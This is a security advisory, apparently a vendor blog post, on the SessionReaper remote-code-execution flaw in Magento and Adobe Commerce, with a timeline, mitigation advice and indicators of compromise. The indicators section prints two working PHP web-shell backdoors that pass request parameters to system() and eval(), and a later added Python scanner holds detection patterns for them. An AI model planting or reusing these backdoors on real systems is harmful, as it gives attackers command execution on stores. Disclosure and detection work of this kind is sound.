
SessionReaper, unauthenticated RCE in Magento & Adobe Commerce (CVE-2025-54236)


by Sansec Forensics Team

Published in Threat Research

SessionReaper (CVE-2025-54236) is a critical bug in Magento & Adobe Commerce that may hand full control of a store to unauthenticated attackers. Automated attacks were observed 6 weeks after initial publication. Merchants should act immediately.


Adobe broke their regular release schedule to publish a fix for a critical (9.1) flaw in all versions of Adobe Commerce and Magento on September 8th. The bug, dubbed SessionReaper and assigned CVE-2025-54236, allows customer account takeover and unauthenticated remote code execution under certain conditions. Sansec was able to simulate the attack and so have less benign parties. It does not help that the Adobe patch was accidentally leaked before the official publication.

Adobe's official advisory describes the impact as "an attacker could take over customer accounts," however the actual risk is remote code execution (the worst kind of bug). The vulnerability researcher who discovered CVE-2025-54236 confirmed this on Slack:

[Image: Slack message from Blaklis confirming pre-auth RCE]

SessionReaper is one of the more severe Magento vulnerabilities in its history, comparable to Shoplift (2015), Ambionics SQLi (2019), TrojanOrder (2022) and CosmicSting (2024). Each time, thousands of stores got hacked, sometimes within hours of the flaw being published.

Timeline

  • Aug 22nd: Adobe internally discusses emergency fix
  • Sep 4th: Adobe privately announces emergency fix to selected Commerce customers
  • Sep 9th: Adobe releases emergency patch for SessionReaper - CVE-2025-54236 in APSB25-88
  • Sep 19th: Ten days after patch release, fewer than 1 in 3 Magento stores have been patched. For Adobe Commerce Cloud, the figures are marginally better at 1 in 2.
  • Oct 14th: Adobe releases official security patches that include SessionReaper fix
  • Oct 22nd: Details published; First attacks detected; 38% of stores patched
  • Oct 24th: Mass scans have reached about 31% of all Magento instances.

What should merchants do?

If you are already using Sansec Shield, you are protected against this attack.

If you are not using Sansec Shield, you should test and deploy the patch as soon as possible. Because the patch disables internal Magento functionality, chances are that some of your custom/external code will break. Adobe published a developer guide with instructions.

If you cannot safely apply the patch within the next 24 hours, you should activate a WAF for immediate protection. Only two WAFs block this attack right now: Adobe Fastly and Sansec Shield.

If you did deploy the patch, but not within 24 hours of publication, we recommend running a malware scanner like eComscan to find any signs of compromise on your system. We also recommend rotating your secret crypt key, as leaking it would allow attackers to update your CMS blocks indefinitely.

How the attack works

Our security team successfully reproduced one possible avenue to exploit SessionReaper, but there are likely multiple vectors. While we cannot disclose technical details that could aid attackers, the vulnerability follows a familiar pattern from last year's CosmicSting attack. The attack combines a malicious session with a nested deserialization bug in Magento's REST API.

The specific remote code execution vector appears to require file-based session storage. However, we recommend merchants using Redis or database sessions to take immediate action as well, as there are multiple ways to abuse this vulnerability.

Active exploitation via /customer/address_file/upload

Sansec tracks ecommerce attacks in real-time around the globe. On October 22nd - 6 weeks after initial publication - we observed the first mass attacks in the wild. PHP backdoors are uploaded via /customer/address_file/upload as a fake session. This happens regardless of patch installation, as Adobe only fixed the session deserialization bug, not the unrestricted file upload issue.

If you found these malicious session files but you did patch in time, you are most likely safe. However, we still recommend removing these files and running a malware scan to see whether the attack led to any backdoors throughout your code base.

Blocking the upload path is not sufficient to prevent the upload of malicious files, as Magento routing allows multiple ways in. Sansec Shield has been blocking these uploads since early September; make sure you are running at least v1.0.14.

Indicators of compromise

As of October 24th, we observed attack probes from dozens of IPs but these are the most common:


Malicious session files may contain code that stores generic PHP backdoors in static.php, bootstrap.php, sysapi.php, gsfa1faewf.txt and several others.

<?php
if (!hash_equals('4009d3fa8132195a2dab4dfa3affc8d2', md5(md5($_REQUEST['pass'] ?? '')))) {
    header('Location:404.php');
    exit;
}
system($_REQUEST['cmd']);
?>
<?php @eval($_REQUEST['cmdddddd']);?>

Most attacks use a serialized GuzzleHttp\Cookie\FileCookieJar object together with GuzzleHttp\Cookie\SetCookie.

In some cases it appears that the attacker is using a broken Eclipse-on-Windows setup to generate payloads, so that the PHP startup warnings from that setup end up in the uploaded session file:

Warning: PHP Startup: Unable to load dynamic library 'bz2' (tried: E:\Tools\eclipse\php7.3\ext\bz2 (The specified module could not be found.), E:\Tools\eclipse\php7.3\ext\php_bz2.dll (The specified module could not be found.)) in Unknown on line 0
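The indicators above (PHP tags inside session data, the serialized Guzzle cookie-jar gadget, the stray bz2 startup warning, and the named backdoor drop files) can be checked on a file-based session store with a small scanner. This is an added example, not Sansec's or Adobe's code; the regexes and the docroot-only check for the backdoor filenames are this example's own assumptions, and the session files in demo() are constructed, not real captures.

```python
import re
import tempfile
from pathlib import Path

# Indicators taken from the post. The patterns themselves are an assumption of
# this example, not Sansec's detection rules.
INDICATORS = {
    "php_tag": re.compile(rb"<\?php|<\?="),
    "guzzle_cookiejar": re.compile(rb"GuzzleHttp\\Cookie\\(FileCookieJar|SetCookie)"),
    "request_exec": re.compile(rb"(eval|system)\s*\(\s*\$_(REQUEST|GET|POST)"),
    "bz2_startup_warning": re.compile(rb"Unable to load dynamic library 'bz2'"),
}
# Filenames the post lists as backdoor drop locations (checked in the docroot only;
# note that app/bootstrap.php is a legitimate Magento file and is not covered here).
BACKDOOR_NAMES = ("static.php", "bootstrap.php", "sysapi.php", "gsfa1faewf.txt")


def scan_bytes(data: bytes) -> list[str]:
    """Return the names of all indicators that match one session file's content."""
    return [name for name, rx in INDICATORS.items() if rx.search(data)]


def scan_session_dir(session_dir: Path) -> dict[str, list[str]]:
    """Map each file in a file-based session store to its matched indicators."""
    hits = {}
    for f in sorted(session_dir.iterdir()):
        if f.is_file():
            found = scan_bytes(f.read_bytes())
            if found:
                hits[f.name] = found
    return hits


def dropped_backdoors(docroot: Path) -> list[str]:
    """List which of the named backdoor files exist directly in the docroot."""
    return [n for n in BACKDOOR_NAMES if (docroot / n).is_file()]


def demo() -> dict[str, list[str]]:
    """Constructed session files (not real captures) run through the scanner."""
    with tempfile.TemporaryDirectory() as tmp:
        d = Path(tmp)
        (d / "sess_legit").write_bytes(b'customer|a:1:{s:2:"id";i:42;}')
        (d / "sess_fake1").write_bytes(
            b'O:31:"GuzzleHttp\\Cookie\\FileCookieJar":1:{s:8:"filename";s:10:"static.php";}')
        (d / "sess_fake2").write_bytes(b"<?php @eval($_REQUEST['cmdddddd']);?>")
        return scan_session_dir(d)


if __name__ == "__main__":
    print(demo())
```

Run scan_session_dir() against the store's session directory and dropped_backdoors() against its docroot; any hit is a reason to remove the file and run a full malware scan, as the post recommends.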

Acknowledgements

Credits to Blaklis for discovering the flaw.

Thanks to Scott Robinson, Pieter Hoste and Tu Van for additional research.

Sansec is not affiliated with Adobe and runs unbiased security research across the eCommerce ecosystem. Sansec protects 1 in 10 of all Magento stores worldwide.
